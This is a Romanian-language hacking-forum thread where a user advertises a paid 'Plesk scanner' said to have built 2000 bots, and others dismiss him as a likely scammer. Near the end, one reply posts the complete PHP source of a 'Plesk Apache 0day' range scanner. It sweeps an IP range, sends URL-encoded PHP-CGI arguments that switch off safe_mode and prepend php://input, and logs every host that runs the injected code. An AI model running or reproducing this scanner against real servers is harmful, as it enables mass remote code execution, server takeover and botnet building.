Jump to content
geoxnox

Scaner Plesk 2013

Recommended Posts

Vand scaner nou plesk.Prinde usere .. am facut 2000 boti cu el pe cateva clase b.Pret 300$

Pt contact mail geoxnox@gmail.com sau pe undernet nick Geox.Daca esti interesat grabeste-te cat inca prinde binde

Ai citit macar regulile? sau esti un user vechi cu nick nou :)) categoria asta nu se face vanzare bagate la market,cred ca miroase a ban :)

Link to comment
Share on other sites

Ok. Deci:

1. "Vanzari/cumparari, rent a hacker" RST Market (Oricum n-ai deste posturi !)

2.

ls -a
. b first game2 game5 game8 go scanplesk.tar tmp
.. cod game game3 game6 game9 parallels setup top
a fever game10 game4 game7 gen plesk start

Asa arata? :) Toate scanerele de plesk sunt la fel ! Ai un scanner cu user/pass exact ca ssh 22 :) Deci te rog, nu ne plictisi !

Cine are nevoie de scanner, PM !

Link to comment
Share on other sites

am citit mai multe posturi si am realizat ca indeferent de post este mereu cineva care sa te contrazica..pacat de forum..

Eu stiam ca atunci cand nu esti interesat pur si simplu nu postezi..referitor la "scanner cu user/pass" am precizat ca e pe baza de exploit nu de bruteforce

Edited by geoxnox
Link to comment
Share on other sites

am citit mai multe posturi si am realizat ca indeferent de post este mereu cineva care sa te contrazica..pacat de forum..

Eu stiam ca atunci cand nu esti interesat pur si simplu nu postezi..referitor la "scanner cu user/pass" am precizat ca e pe baza de exploit nu de bruteforce

Ok, atunci arata-ne si noua exploit-ul :) sa stie lumea ce cumpara.

Link to comment
Share on other sites

cum frate sa iti arat daca il vand ? daca ai intentia de a cumpara spune-mi si iti arat unde sa intrii sa vezi dovada..

Dovada trebuie sa vina de la tine, ca tu vrei sa vinzi nu sa intrie cineva undeva sa vada dovada :) ca sa cumpere cineva ceva trebuie sa dovedesti altfel iese numai povesti aicea si nimeni nu te baga in seama

Deja o dai in vrajeala poti sa faci un video si cenzurezi ce nu vrei sa arati :)

Link to comment
Share on other sites

Dovada trebuie sa vina de la tine, ca tu vrei sa vinzi nu sa intrie cineva undeva sa vada dovada :) ca sa cumpere cineva ceva trebuie sa dovedesti altfel iese numai povesti aicea si nimeni nu te baga in seama

Deja o dai in vrajeala poti sa faci un video si cenzurezi ce nu vrei sa arati :)

Bine zici !!!!!!

Link to comment
Share on other sites

cu riscul de a primi ban zic ca e degeaba forumul asta..

Toti aicia sunt neseriosi si forumul la fel, numai tu esti serios :))

geoxnox a zis ====in loc de sustinere primesti palme peste ochii , imi pare rau pt timpul pierdut cu postarea

Da nu te sustine la dat teapa nu esti primul si nici ultimul cu vrajeli de 15 ani suntem satui toti aicea pe forum de discuti de felul asta.

Edited by neox
Link to comment
Share on other sites

Ba frate tu mai esti si nesimtit pe langa , zici ca l-ai facut tu ma ? Ai facut tu o p*la ca sa zic asa , toti care inca traiti pe IRC-u ala de cacat gol numit undernet va laudati c-ati facut ceva cand ati modificat niste Echo-uri sau daca n-ati reusit sa modificati acolo v-ati bagat in hex ca femeile. Ce sustinere astepti ma cand tu nu arati nimic ? Nici macar un copy paste , un print screen nimic ? Te-a durut ? 2000 de boti , au la el :) Urmatoru' mal0ne de-i gura de el. Te-n plm de-aci , mai si vrei sa faci bani pe munca altora , lepra.

Vrei sa ajuti comunitatea, Da-l cui crezi ca merita si are cap sa-l foloseasca la ceva , nu vrei , dispari dreq.

Mi-am exprimat doar parere sincera si proprie. Cui nu-i convine , is posturi mai interesante pe facebook cu catzelushi si caption-uri stupide de citit.

Link to comment
Share on other sites

Cei care sunt vechi pe acest forum, au vazut destui "baieti noi" care sunt obisnuiti sa dea tepe. In fiecare zi aproape, sunt useri banati, a doua zi apar aceasi oameni cu acelasi scop: sa dea teapa de 20$ 30$ (chiar si la 100$). Lucrul mai interesant si amuzant, este faptul ca sunt multi care pun botul.

Ai putea la fel de bine sa fii acesta : https://rstforums.com/forum/70499-userul-smaster-mare-tepar-aveti-grija.rst

sau acesta : https://rstforums.com/forum/49053-teapa-inselaciune-300-lei.rst

sau unul din acestia : https://rstforums.com/forum/search.php?searchid=1333007

Vi tu cu user de luna trecuta si cu 10 posturi (facute in acest thread) si te mai si plangi ca iti sare lumea in cap.

Forumul incearca sa ii indeparteze pe potentialii useri care vor sa ii prosteasca pe altii. Asa ca nu mai fa gat tu acum.

Edited by awnly3jhc2g
Link to comment
Share on other sites

<?php

error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout", 5);

function http_send($host, $packet,$cmd)

{

if (($sock = fsockopen($host, 80))){

fputs($sock, $packet);

return stream_get_contents($sock);

}

}

print "\n+----------------------------------------------------------------------+";

print "\n| Plesk Apache (8.6,9.x) 0day Remote Range Scanner By Black-ID |";

print "\n+----------------------------------------------------------------------+\n";

if ($argc < 2)

{

print "\nUsage......: php $argv[0] <Start Ip> <End Ip>\n";

print "\nExample....: php $argv[0] 192.168.1.1 192.168.2.255\n";

die();

}

$start = ip2long($argv[1]);

$end = ip2long($argv[2]);

for($ip=$start; $ip<=$end; $ip++)

{

$host = long2ip($ip);

$payload = '<?php echo "Content-Type:text/html\r\n\r\n";echo "___2pac\n"; ?>';

$arguments = "%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E";

$path = "%70%68%70%70%61%74%68/%70%68%70";

$packet = "POST /{$path}?{$arguments} HTTP/1.1\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n\r\n{$payload}";

$response = http_send($host,$packet);

if(preg_match('/___2pac/', $response, $m)){

print "[+] $host Infected\n";

$log = fopen("log.txt","a");

fwrite($log,"$host\n");

fclose($log);

}else{

print "[-] $host Not Infected\n";

}

}

?>

ok

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...